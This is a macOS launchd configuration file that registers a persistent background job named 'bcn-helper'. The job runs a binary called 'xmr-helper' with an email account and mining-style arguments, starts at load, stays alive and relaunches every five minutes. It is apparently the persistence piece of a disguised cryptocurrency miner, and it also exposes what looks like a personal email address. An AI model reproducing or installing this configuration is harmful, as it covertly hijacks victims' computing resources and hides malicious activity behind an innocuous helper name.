<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>KeepAlive</key>
	<true/>
	<key>Label</key>
	<string>bcn-helper</string>
	<key>ProcessType</key>
	<string>Background</string>
	<key>ProgramArguments</key>
	<array>
		<string>/usr/bin/env</string>
		<string>/bin/./xmr-helper</string>
		<string>-user</string>
		<string>randy.lee.mcmillan@gmail.com</string>
		<string>--xmr</string>
		<string>2</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
	<key>StandardErrorPath</key>
	<string>/tmp/bcn-helper.err</string>
	<key>StandardOutPath</key>
	<string>/tmp/bcn-helper.out</string>
	<key>StartInterval</key>
	<integer>300</integer>
</dict>
</plist>
